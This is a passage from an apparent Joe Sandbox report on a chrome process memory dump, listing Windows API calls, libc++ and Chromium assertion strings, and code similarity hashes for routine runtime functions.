                                                    • FormatMessageW.KERNEL32(00001300,00000000,00E71859,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00E715FB
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00E71859,?,?), ref: 00E71605
                                                      • Part of subcall function 00DE0030: GetLastError.KERNEL32 ref: 00DE00AC
                                                      • Part of subcall function 00DE0030: SetLastError.KERNEL32(00000000), ref: 00DE00BA
                                                      • Part of subcall function 00DE0030: SetLastError.KERNEL32(?), ref: 00DE017B
                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E71662
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E71775
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E7177C
                                                    • (0x%lX), xrefs: 00E71673
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00E7176E
                                                    • Error (0x%lX) while retrieving error. (0x%lX), xrefs: 00E7160D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FormatFreeLocalMessage
                                                    • String ID: (0x%lX)$..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Error (0x%lX) while retrieving error. (0x%lX)
                                                    • API String ID: 2740663437-2412322823
                                                    • Opcode ID: 1d71bccc63a48a4901a9c6cca97a7952ed5e8b3f73aeae97ec5cd2c8cbf2049f
                                                    • Instruction ID: f18e7f05d0e2d63838327da89669aa769e222e1cbe868a8cefc33c09f10438ea
                                                    • Opcode Fuzzy Hash: 1d71bccc63a48a4901a9c6cca97a7952ed5e8b3f73aeae97ec5cd2c8cbf2049f
                                                    • Instruction Fuzzy Hash: FF41F6B1E003596FDB01EFA4DC85ABF7BB8EF49704F049069F809BA211E630AA45C761
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00D3D046
                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D3D049
                                                    • GetCurrentThread.KERNEL32 ref: 00D3D053
                                                    • SetThreadPriority.KERNEL32(00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D3D058
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D3D0B6
                                                    • GetCurrentThread.KERNEL32 ref: 00D3D0C1
                                                    • SetThreadPriority.KERNEL32(00000000,?), ref: 00D3D0CC
                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00D3D0DA
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D3D1D4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Thread$CurrentPerformancePriorityQuery$Counter$Frequency
                                                    • String ID:
                                                    • API String ID: 2845919953-0
                                                    • Opcode ID: 94d12c969f96c96cde04dac8b15f5137a72389a38728222ea9ed38d9927cba8f
                                                    • Instruction ID: b614f1d4427a5f6cf0359224e12e8ffedd9816c8a59c4ee9c2d8914e2ebe16c2
                                                    • Opcode Fuzzy Hash: 94d12c969f96c96cde04dac8b15f5137a72389a38728222ea9ed38d9927cba8f
                                                    • Instruction Fuzzy Hash: B1517A719047448FC311DF35E84552ABBF5FF99790F108A2EF48573261EB32A949CB42
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000040), ref: 00D3D6D0
                                                    • ReleaseSRWLockExclusive.KERNEL32(00000002), ref: 00D3D73F
                                                      • Part of subcall function 00DA8000: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DA8047
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,AF000000,?,00E8D674), ref: 00D3D769
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000040), ref: 00D3D9A2
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D3DA63
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: first$second
                                                    • API String ID: 17069307-3095674784
                                                    • Opcode ID: c5128c5fd703e083dcade79de3cfc3b847700928499e125fe579bf6831cf659d
                                                    • Instruction ID: 3da9c0cf3ed33512305c73d66de874b06677256b6ac9c6d50ac5b24c2a229572
                                                    • Opcode Fuzzy Hash: c5128c5fd703e083dcade79de3cfc3b847700928499e125fe579bf6831cf659d
                                                    • Instruction Fuzzy Hash: 91F1CE756047019FC718CF28D880A2AB7E2FFC8324F19892DF5999B2A2D730E945CF61
                                                    APIs
                                                    • __floor_pentium4.LIBCMT ref: 00E508C1
                                                    • GetStringTypeW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00E51CA3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: StringType__floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 2638037228-2761157908
                                                    • Opcode ID: c20e368be399c65e943edadf4ca5e57acfb7d8a033e484df4ac146770000e84d
                                                    • Instruction ID: 88f4c3bba6d3a4c1430b888fdacf49ecdc47a23f6ab42d0d1bb5e1c99a60cc3c
                                                    • Opcode Fuzzy Hash: c20e368be399c65e943edadf4ca5e57acfb7d8a033e484df4ac146770000e84d
                                                    • Instruction Fuzzy Hash: 27D24A71E082298FDB65CE28DD407EAB7B5EB44306F1455EAE80DF7240E774AE898F41
                                                    APIs
                                                    • InitOnceExecuteOnce.KERNEL32(00F00488,00D9A780,00000000,00000000), ref: 00D4B6DB
                                                      • Part of subcall function 00E09410: InitOnceExecuteOnce.KERNEL32(00F00488,00D9A780,00000000,00000000,?,00D4B992,?,?,?), ref: 00E0942D
                                                    Strings
                                                    • ..\..\base\observer_list.h, xrefs: 00D4AC18
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D4AC5B
                                                    • AddObserver, xrefs: 00D4AC1D
                                                    • Observers can only be added once!, xrefs: 00D4AC41
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Once$ExecuteInit
                                                    • String ID: ..\..\base\observer_list.h$..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$AddObserver$Observers can only be added once!
                                                    • API String ID: 689400697-421725328
                                                    • Opcode ID: f10a7029ed9f9c4b016ee75fda8adadd880657251abf98f0ee2fc8326842f761
                                                    • Instruction ID: 952f04e4b8100767ef375752434fd6afb20cb4a27decdc4581fb628275ba3a3a
                                                    • Opcode Fuzzy Hash: f10a7029ed9f9c4b016ee75fda8adadd880657251abf98f0ee2fc8326842f761
                                                    • Instruction Fuzzy Hash: E3B25D75600706CFCB24CF28D480A6AB7F1FF94314F198A5AD89A5B752D370F946CBA2
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DF84B0
                                                    • PERFETTO_CHECK(false), xrefs: 00DF8495
                                                    • ..\..\third_party\perfetto\include\perfetto\tracing\track_event_interned_data_index.h, xrefs: 00DF8486
                                                    • %s (errno: %d, %s), xrefs: 00DF849A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: %s (errno: %d, %s)$..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\perfetto\include\perfetto\tracing\track_event_interned_data_index.h$PERFETTO_CHECK(false)
                                                    • API String ID: 4168288129-2023842766
                                                    • Opcode ID: fd071288b683b0b4513122af4b738323fa5ad921985d3be9ef5eb3a258872ba2
                                                    • Instruction ID: 2910586de33e9787c55d0515e94ddfff0f8b83cc33fc1aa4a9395d3fa1791563
                                                    • Opcode Fuzzy Hash: fd071288b683b0b4513122af4b738323fa5ad921985d3be9ef5eb3a258872ba2
                                                    • Instruction Fuzzy Hash: DC728B71A046198FDB25CF64C8807EDB7B2BF49310F19856ADA0ABB350DB30AD85CF61
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DF1F8D
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DF20A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: T$T
                                                    • API String ID: 17069307-3594344597
                                                    • Opcode ID: c02cb90f901a8068c138e96d174a09709c685ac2422a37076b8706d3bd401d8e
                                                    • Instruction ID: 03a099936fff2ccaed36737a70a15eb723ef2b778214d1b64c5facffc142e3bf
                                                    • Opcode Fuzzy Hash: c02cb90f901a8068c138e96d174a09709c685ac2422a37076b8706d3bd401d8e
                                                    • Instruction Fuzzy Hash: D6F1C776E002098BDB14CF64D88067DB7B6BF85310F6AC229EA15AB351DB71EC45CBA0
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF6354
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF6365
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF6376
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF6387
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF63B1
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF63C2
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF63D3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: 0c14b4d5ba52c18f69ec4676d165ca03ebc9d5c61bb95306ed2ac1850c8daa2b
                                                    • Instruction ID: 7d0d89b7781409fc912e86327a62db11c1868277795acf84696d8c7a05acfa8a
                                                    • Opcode Fuzzy Hash: 0c14b4d5ba52c18f69ec4676d165ca03ebc9d5c61bb95306ed2ac1850c8daa2b
                                                    • Instruction Fuzzy Hash: ABE1D2719007848FD320CF388454766BBE1BF95314F1ECA6DD5AA8B762EB30E885CB61
                                                    APIs
                                                    Strings
                                                    • ", xrefs: 00DF8617
                                                    • ..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00DF8E5E
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00DF8E65
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: "$..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr
                                                    • API String ID: 4218353326-3931686229
                                                    • Opcode ID: 799eb22f5fd9ac103d4e0c7efa8f401e776b7765a5afe0d6749d07e1ec758719
                                                    • Instruction ID: 396cd8fc06a8298a149993980a175fb0a32b4b52a7c0523165ff33c149a391ef
                                                    • Opcode Fuzzy Hash: 799eb22f5fd9ac103d4e0c7efa8f401e776b7765a5afe0d6749d07e1ec758719
                                                    • Instruction Fuzzy Hash: 1B624971E002189FCB14CF69D4809ADFBF6BF88314B29C569E959AB351DB31AC05CFA1
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DCAC98
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DCA955, 00DCAA01, 00DCACA9
                                                    • ..\..\third_party\libc++\src\include\vector:1557: assertion __first <= __last failed: vector::erase(first, last) called with invalid range, xrefs: 00DCACEF
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DCA973, 00DCACFE
                                                    • ..\..\third_party\libc++\src\include\vector:1539: assertion !empty() failed: vector::pop_back called on an empty vector, xrefs: 00DCA964
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds$..\..\third_party\libc++\src\include\vector:1539: assertion !empty() failed: vector::pop_back called on an empty vector$..\..\third_party\libc++\src\include\vector:1557: assertion __first <= __last failed: vector::erase(first, last) called with invalid range
                                                    • API String ID: 2882836952-3981179074
                                                    • Opcode ID: b9e08c780bc65cf1f59bca8cd2dcc3c5d1b26ed1c1e5b571b4c668179484c938
                                                    • Instruction ID: 000a0764429b3afd20f489a8165b918be1821bbdfc45bf5bb53510b2ecf7f89c
                                                    • Opcode Fuzzy Hash: b9e08c780bc65cf1f59bca8cd2dcc3c5d1b26ed1c1e5b571b4c668179484c938
                                                    • Instruction Fuzzy Hash: AFD16375B0020A9FCB24CF6CD581B6AB7E2FB88314B29852DD556A7345DB31AC41CBA2
                                                    APIs
                                                    Strings
                                                    • GenuineIntel, xrefs: 00D68259
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D6840B
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D683FD
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D68404
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$GenuineIntel
                                                    • API String ID: 4218353326-3642438641
                                                    • Opcode ID: 01b60db5fb40311808e0b088ba4085bfae71cc2948da16db911b31009bdee15e
                                                    • Instruction ID: faa31ce01544165869ee4a199aa7deb1b32b513041e9996684aa6156c1ccc015
                                                    • Opcode Fuzzy Hash: 01b60db5fb40311808e0b088ba4085bfae71cc2948da16db911b31009bdee15e
                                                    • Instruction Fuzzy Hash: 82B1E4B1E047458FDB18CF69C4813AEBBF1EB28304F144A2ED886E7742DA75E905DB64
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF2C61
                                                    • 1U!S, xrefs: 00DF28EA
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DF2C70
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF2C91
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DF2CA0
                                                    • 1U!S, xrefs: 00DF287A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
